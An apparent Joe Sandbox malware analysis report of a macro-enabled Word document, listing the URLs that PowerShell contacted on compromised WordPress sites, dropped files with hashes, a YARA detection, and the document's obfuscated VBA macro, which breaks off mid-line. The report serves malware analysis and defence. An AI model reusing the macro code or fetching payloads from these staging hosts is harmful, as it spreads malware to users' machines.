http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmpfalse
    		high
    http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/PEpowershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://ckfoods.net/wp-admin/wPInm2rgMu/powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://primtalent.com/wp-admin/9yt1u/powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000004.00000002.434822089.00000000002D0000.00000004.00000020.sdmpfalse
      		high
      http://huskysb.com/wordpress/6f0qIQlWPaYDfa/powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://adorwelding.zmopowershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://server.zmotpro.com/venkat/powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://adorwelding.zmotppowershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://manak.edunetfpowershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://www.%s.comPApowershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmpfalse
      • URL Reputation: safe
      		low
      http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      http://primtalent.com/wp-admin/9powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/Ppowershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWpowershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://ckfoods.net/wp-admin/wPpowershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmptrue
      • Avira URL Cloud: safe
      		unknown

      Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:526268
      Start date:22.11.2021
      Start time:13:15:10
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 31s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:704.doc
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:6
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • GSI enabled (VBA)
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal92.expl.evad.winDOC@5/13@0/0
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 1
      • Number of non-executed functions: 1
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .doc
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
      • Execution Graph export aborted for target powershell.exe, PID 2776 because it is empty
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • Report size getting too big, too many NtSetInformationFile calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      13:15:25API Interceptor64x Sleep call for process: powershell.exe modified

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F744DDE.png
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:PNG image data, 1127 x 490, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):121507
      Entropy (8bit):7.978393301250379
      Encrypted:false
      SSDEEP:3072:oXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqc:oXw50+OukzVXV2uhDj
      MD5:D3C11BC087FAF4372F4C5D37E06FCFFD
      SHA1:40A9FE4D47DADFDB1463D63F14D6D60641AC19E5
      SHA-256:6F49F13CEF0667A75A3E55767CD769F476EB3FF400BDA8CB3FBF47BA8B0A7077
      SHA-512:C50363E3CA99B4537A8BA625D84CD0A8C2E8FB15D1FF0163E967D3536E373F3449EB4489EC117766D78B1386D60192453FAE8C372119E32D98E58B07844216EB
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: .PNG........IHDR...g.........&.......sRGB.........IDATx^..`....^..K.,[.w..tB..Hh.B......B.IH.4z3....1.\q..z?..m...=.d.P....".........7...]g..!I...`.o.@.. .D...."@.... .D`.%`.......]......T.1.4.A..@8.|....."@.... .D...."...0...".'.CS...7.......jn..TM..~(..!........."@.... .D....".....0.C.$..y.....(^..IK.z...VM.&...G:.) .AV5v...!...`.."H.`.....C.'.%.3w--..>.I..."@.... .D...."..#..R.d..&L[3...5.zj.{/...5..u.C...; .P,.xY.T.4%=...!:$.)..)..#..[>..F.zD.... .D...."@........D.k.0v......t3..w..66.+.d........+....K.....G.=,H.Ur..x..2E. ...O"...:.g.Le...;...O..qw....n...$*...."@.... .D.....J #B.|M.qS.M<..5......j.e.O.!vL.qa.)*D.$).d.."...v..{....:..,.vy.._.k...:#...&........2.p>^,.g.b...a7....C...N....+..ke.g&#.r...Q)D...."@.... .D...+..U.....'.f..P5..=[#q.a.G...W.VF.Y.e..e=.km......]2.7rh.C..u...d.Ru..;c.;.V....*..:^]..5CQ.W....&..$..|.J2.....V4{.U..i....py.t.....,.....+..U.r+..0..R\.s....NB..$#.....~....R".....k..{.... .D....".W.dD.q.1m..-......E4<t..}
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:Composite Document File V2 Document, Cannot read section info
      Category:dropped
      Size (bytes):41984
      Entropy (8bit):5.396502435833668
      Encrypted:false
      SSDEEP:768:QoV2gfCYtBMnkyXpua8HfxV2gfCgtBMnkyXpua8H:Y6N7MkVhHG6B7MkVhH
      MD5:CE9E5A2954866976632E497655B1882B
      SHA1:D1518E3C3269FD2E6512D6045A463CBE09211E99
      SHA-256:75A2A12D357329BB6C6CAC8730CDA50728B0A37B53DEE4D585F00F235607E45E
      SHA-512:19E743670CB5B16DEE433A19EB0EBD9A31D6D36C28AF9C5944C1CD8645EF278CF07F3812B674415D67EAB4DAEAB71F0F442E63D4631E9472614F66AE2C02C144
      Malicious:false
      Reputation:low
      Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................(...*...........................................................................................................................................)...+...6...O...........................................,...................................................................................................P...........................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{58F32F91-EE55-4449-B0B3-F02D5B2E95D2}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1024
      Entropy (8bit):0.05390218305374581
      Encrypted:false
      SSDEEP:3:ol3lYdn:4Wn
      MD5:5D4D94EE7E06BBB0AF9584119797B23A
      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
      Malicious:false
      Reputation:high, very likely benign file
      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8907FAB7-1F61-4790-AB28-47403D75A993}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):2
      Entropy (8bit):1.0
      Encrypted:false
      SSDEEP:3:X:X
      MD5:32649384730B2D61C9E79D46DE589115
      SHA1:053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4
      SHA-256:E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
      SHA-512:A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C
      Malicious:false
      Reputation:high, very likely benign file
      Preview: ..
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EB899D35-EEB1-4849-9BF6-6658C3435874}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1536
      Entropy (8bit):3.1478370528780375
      Encrypted:false
      SSDEEP:24:HfCemjup6uKTHuJPkTQXaHINvhSBxD+aoF:TKTOJuymfO
      MD5:582FA24D082E9486E72A1B9681CDF97B
      SHA1:CB23EE4B0A2D6188A7C39562DB5B4AA8A9C4FBB9
      SHA-256:F857A260E9DC18D6B5A51207FAC4F1A8A985840E8132CCFB324DEAC36DF67145
      SHA-512:48BDDEC49E6DDE25F4BC3D28C2A8D33E7382022226DF0A836044EB1A3E69FA5A46712AE301BF478C23F686297EB5E9BD9AE2C7A29F03628706CE69BA9E08EDCA
      Malicious:false
      Reputation:low
      Preview: ../... ... . ... ... ..... . ... ... . ..... . ....... ... ..... ......... . . ... . ... ... . . ............. . ....... ... ............... ... ......... ......... . . ....... . ..... . . ... ... ... . .....................................................................................................................................................................................................................................................................................................................................@...H...\...f...h...|................................................................................................................................................................................................................................................................................................................................................L.......\. ............gd|b..........).Y...gd..T.............gd|H...............L.......\. ............gd..T.......
      C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):147284
      Entropy (8bit):4.421579591711272
      Encrypted:false
      SSDEEP:1536:C8HL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcmB:CkJNSc83tKBAvQVCgOtmXmLpLmB
      MD5:4E827FA2947FDADD8926FF58D42BC7E9
      SHA1:65C90AB768A1D7FBABB6F1C719110DA6FD5D9B12
      SHA-256:5CD589A641061016C526FCB4220895E8A323BB7DCC27FC6C540A9BA594A7750B
      SHA-512:3D23844999CC2DC772141B7071760A318495D9008B929229F6BDC7CDFC3AFD2B532FD39863BBAFA122C566B908E0917A7DCA0AD5D063BAE9FDDFCB1BDB2F9653
      Malicious:false
      Reputation:low
      Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8...........N..............\W...............J..............,<...............<..............xW..............xY..xG.............T...........D...............................T...............................................................&!..d...........................................................................................
      C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:Composite Document File V2 Document, Cannot read section info
      Category:dropped
      Size (bytes):57856
      Entropy (8bit):4.701644950261556
      Encrypted:false
      SSDEEP:768:gkvd/MFp4Zgj+KmkyGhAQhQw4vwQAYYyWWwgekrrozS6X+W:HM/j1xXhQmkrrozS6OW
      MD5:3AD53E44E66D3E083F7DF8F643C4CA3E
      SHA1:44B4AB308D072BADDFD8C7138508F11A4FB0F9BF
      SHA-256:1CE1F8D3E16D8DB7F0B001101283CD500B3DC59073AD01400D18E6BF4F6AFCFA
      SHA-512:480174C894799065B0F1C86A1CCE51BAAE26951667DF232FFE399A7B761D0022C4DF8620D08B32C3EDF18806F2E56D8E96081E3D762235BF9092A953E03ACB53
      Malicious:true
      Yara Hits:
      • Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP, Author: Florian Roth
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Preview: ......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................J....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7.......9...:...;...<...=...F...?...@...A...B...C...D...E...8...G...H...I.......l...L...M...N...S...P...Q...R.......m...]...V...W...X...Y...Z...[...\...O...^..._...`...a...j...c...d...e...f...g...h...i...T...k...........n...o...............................................
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\704.LNK
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:59 2021, mtime=Mon Aug 30 20:08:59 2021, atime=Mon Nov 22 20:15:18 2021, length=136531, window=hide
      Category:dropped
      Size (bytes):973
      Entropy (8bit):4.501036887264172
      Encrypted:false
      SSDEEP:12:8n2wfq0gXg/XAlCPCHaXvB4XB/a/X+W6Dp2nEicvbIX8vs5DtZ3YilMMEpxRljKN:8HP/XT/4Imp2nveE0s5Dv3q3Qd7Qy
      MD5:0014D6DE553BD69E527052AF58AC3A74
      SHA1:B61ADCFD29FD6F5BE647FAB62F82B4D2B319C22D
      SHA-256:CC1F9F876CB4A4CF9838CE5FB0B9DF6ED8F1A16A2AB387694CD5CA1DC52A714B
      SHA-512:6FD6626E49D1D9B86B20CB21C1D024FB79E4C0C1ED9E3E688A6F63B0EA235C15BAAB38E6E46D7A3DB24BB7570B3DEBF8BDE5A78DF3D1316DDB250609384F563F
      Malicious:false
      Preview: L..................F.... .....U@.....U@....Y&.....S............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S!...user.8......QK.X.S!.*...&=....U...............A.l.b.u.s.....z.1......S"...Desktop.d......QK.X.S".*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....R.2.S...vS. .704.doc.<.......S ..S .*.........................7.0.4...d.o.c.......q...............-...8...[............?J......C:\Users\..#...................\\414408\Users.user\Desktop\704.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.7.0.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......414408..........D_....3N...W...9..g............[D_....3N...W...9..g............[....
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):57
      Entropy (8bit):4.440640076685947
      Encrypted:false
      SSDEEP:3:bDuMJl+VomX1SVtBVov:bCJaV9y
      MD5:2B1A3D4E9531BB7AAAEEE91097C6E6C8
      SHA1:CDCB8BB8DF9FDC8AE6C9B4E7B3FA485B8075C74B
      SHA-256:7C5B1F305E5CDABE223B67B449800F306C63D8B354CA4A21F1C8C20E909EC8E1
      SHA-512:B2ED8A04808A83A548F91A0CFA5B3D830A05EB52D6B4F436B02D3ADDF1A020DBE04252F19E778E706827A16CBB7E3ECED7BBD8E82E69096A1328E2BEFA478374
      Malicious:false
      Preview: [folders]..Templates.LNK=0..704.LNK=0..[doc]..704.LNK=0..
      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.5038355507075254
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
      Malicious:false
      Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):8016
      Entropy (8bit):3.58293275849656
      Encrypted:false
      SSDEEP:96:chQCcMqGqvsqvJCwo5z8hQCcMqGqvsEHyqvJCworXzIyYDH6F2htlUVjA2:ci7o5z8ivHnorXzIoF2hCA2
      MD5:8F22547DE16012FD240D42D18B0C5959
      SHA1:0B61D0A635BC93922E916B17EC50B9360EB3B752
      SHA-256:7CD9D5910D7CD1976ABC501A7115AB590611E139043382C83574ADE07AF79921
      SHA-512:04229BA1E0EDEDD2D729F1E27D2222F30AB613CAAE2F196C547EFC6AE2C5F59BE15D9BCADBCFCEA45155FCEA89ED2EA99A22073A36EE0FDD4D05D0F842AF8415
      Malicious:false
      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J29WGVF1UDYP81V0IINR.temp
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):8016
      Entropy (8bit):3.58293275849656
      Encrypted:false
      SSDEEP:96:chQCcMqGqvsqvJCwo5z8hQCcMqGqvsEHyqvJCworXzIyYDH6F2htlUVjA2:ci7o5z8ivHnorXzIoF2hCA2
      MD5:8F22547DE16012FD240D42D18B0C5959
      SHA1:0B61D0A635BC93922E916B17EC50B9360EB3B752
      SHA-256:7CD9D5910D7CD1976ABC501A7115AB590611E139043382C83574ADE07AF79921
      SHA-512:04229BA1E0EDEDD2D729F1E27D2222F30AB613CAAE2F196C547EFC6AE2C5F59BE15D9BCADBCFCEA45155FCEA89ED2EA99A22073A36EE0FDD4D05D0F842AF8415
      Malicious:false
      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
      C:\Users\user\Desktop\~$704.doc
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.5038355507075254
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
      Malicious:true
      Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

      Static File Info

      General

      File type:Microsoft Word 2007+
      Entropy (8bit):7.953888666040384
      TrID:
      • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
      • Word Microsoft Office Open XML Format document (49504/1) 32.35%
      • Word Microsoft Office Open XML Format document (43504/1) 28.43%
      • ZIP compressed archive (8000/1) 5.23%
      File name:704.doc
      File size:146367
      MD5:40f85d07da2533d576b1f2d7c043a2da
      SHA1:60b84d70a6511483c6de131fb62e30a99edff5c4
      SHA256:d05ec2a0134518ec74fcbee94a522c3837d82b7b5d2f162b8466850fc4f1be0d
      SHA512:fb718ea1a81fdcba7c933cd55a54beeee660a7e4d5b0a1e1ee11351e40cc691dd3fb644dce60335dfea9c983fc5a4ce079b2a3349fb26c77c444c66cada454a2
      SSDEEP:3072:hAGj2SXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqDve/Nk:9CSXw50+OukzVXV2uhDCG/Nk
      File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

      File Icon

      Icon Hash:e4eea2aaa4b4b4a4

      Static OLE Info

      General

      Document Type:OpenXML
      Number of OLE Files:1

      OLE File "/opt/package/joesandbox/database/analysis/526268/sample/704.doc"

      Indicators

      Has Summary Info:False
      Application Name:unknown
      Encrypted Document:False
      Contains Word Document Stream:
      Contains Workbook/Book Stream:
      Contains PowerPoint Document Stream:
      Contains Visio Document Stream:
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:True

      Summary

      Author:1
      Template:Normal.dotm
      Last Saved By:1
      Revion Number:103
      Total Edit Time:211
      Create Time:2021-11-15T15:39:00Z
      Last Saved Time:2021-11-18T19:09:00Z
      Number of Pages:1
      Number of Words:16
      Number of Characters:95
      Creating Application:Microsoft Office Word
      Security:0

      Document Summary

      Number of Lines:1
      Number of Paragraphs:1
      Thumbnail Scaling Desired:false
      Company:
      Contains Dirty Links:false
      Shared Document:false
      Changed Hyperlinks:false
      Application Version:12.0000

      Streams with VBA

      VBA File Name: cvbku3gakuisdgfilu3gblaw.cls, Stream Size: 10382
      General
      Stream Path:VBA/cvbku3gakuisdgfilu3gblaw
      VBA File Name:cvbku3gakuisdgfilu3gblaw.cls
      Stream Size:10382
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 01 00 00 f0 00 00 00 9e 08 00 00 d4 00 00 00 02 02 00 00 ff ff ff ff a7 08 00 00 3f 1b 00 00 00 00 00 00 01 00 00 00 ea eb ff 49 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      Attribute VB_Name = "cvbku3gakuisdgfilu3gblaw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function dsfl3hadfkb3lkahfoiauhfcfgkwy3jfrkiwed(Optional ByVal Title As String = ",", Optional ByVal InitialPath As String = ":") As String
    Dim PS As String: PS = Application.PathSeparator
    With Application.FileDialog(msoFileDialogFolderPicker)
        If Not Right$(InitialPath, 1) = PS Then InitialPath = InitialPath & PS
        .ButtonName = ":": .Title = Title: .InitialFileName = InitialPath
        If .Show <> -1 Then Exit Function
        If Not Right$(GetFolderPath, 1) = PS Then GetFolderPath = GetFolderPath & PS
    End With
End Function
Sub sfoliq3hwoqihepolfijp()
    gjpo4jaiwledkgls = GetFolderPath(",", ThisWorkbook.Path)
    If gjpo4jaiwledkgls = "" Then Exit Sub
    MsgBox ":" & gjpo4jaiwledkgls, vbInformation
End Sub
Sub dfloaswehortiwholehfolsihlkw()
    txt$ = FileToVBAFunction(",", ",")
    Debug.Print txt$
End Sub
Sub fbkaw4lkuwgbtlske()
Dim WB As Workbook
Set WB = GetAnotherWorkbook
If Not WB Is Nothing Then
MsgBox "&" & WB.FullName, vbInformation
Else
MsgBox ",", vbCritical: Exit Sub
End If
x = WB.Worksheets(1).Range("a2")
End Sub
Function goh4iahwodegiyna89deyfni(fhi3hof3hfolk As String, dfh3olhuiefoiasihkl As String) As String
Dim cbuay7aygsikjbkv As Integer
Dim fjoq3wihrpoa8fghoashf As String: cbuay7aygsikjbkv = 10: fjoq3wihrpoa8fghoashf = Replace(fhi3hof3hfolk, dfh3olhuiefoiasihkl, "")
For sgdyuiwuygiasb = 1 To cbuay7aygsikjbkv
If sgdyuiwuygiasb > 20 Then
MsgBox ","
End If
Next
goh4iahwodegiyna89deyfni = fjoq3wihrpoa8fghoashf
End Function
Function gajowisjd90asdilkf() As Object
On Error Resume Next
Dim coll As New Collection, WB As Workbook
For Each WB In Workbooks
If WB.name <> ThisWorkbook.name Then
If Windows(WB.name).Visible Then coll.Add CStr(WB.name)
End If
Next WB
Select Case coll.Count
Case 0
MsgBox ",", vbCritical, ","
Case 1
Set GetAnotherWorkbook = Workbooks(coll(1))
Case Else
For i = 1 To coll.Count
txt = txt & i & vbTab & coll(i) & vbNewLine
Next i
msg = "&" & vbNewLine & vbNewLine & txt
res = InputBox(msg, ",", 1)
If IsNumeric(res) Then Set GetAnotherWorkbook = Workbooks(coll(Val(res)))
End Select
End Function
Sub fjow3efyw98efhasdokfhlnkvawofh3(nart4kuagiuagsaedr54 As Long, bvagh4iauhoshetret As Long, fbhqwieusiyeoiwugeig As String): Dim sdgbvku3giqugfi2, fhokl34rhyw5uwegea, hkqwfsadesf As String
